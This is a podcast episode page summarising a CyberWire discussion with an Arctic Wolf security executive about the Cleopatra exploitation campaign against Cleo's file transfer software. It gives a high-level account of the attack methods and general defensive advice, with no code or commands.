CyberWire Daily Cleo’s trojan horse. [Research Saturday]
20 snips
Feb 8, 2025 Mark Manglicmot, SVP of Security Services at Arctic Wolf, is a cybersecurity expert who dives into the Cleopatra mass exploitation campaign. He discusses the alarming use of a Java backdoor, which attackers deploy via PowerShell stagers, exploiting vulnerabilities in Cleo's MFT software. Mark highlights the ongoing challenges in cybersecurity, emphasizing the need for proactive measures and vigilance against evolving threats. He also stresses the importance of software updates and robust vulnerability management to fend off sophisticated tactics like those used in the Cleopatra campaign.
AI Snips
Chapters
Transcript
Episode notes
MFT as an Attractive Target
- Managed File Transfer (MFT) software has become an attractive target for ransomware attackers.
- Accessing MFT software allows attackers to compromise multiple companies in a supply chain simultaneously.
Termite Group's Attacks
- The Termite group attacked Blue Yonder, a supply chain management software, in November.
- They used a similar attack method in the Cleopatra attack this summer.
Mitigating Attack Chain
- Monitor for malicious PowerShell scripts connecting to external IPs and downloading payloads.
- Pay close attention to any software using auto-run features, and restrict file system access.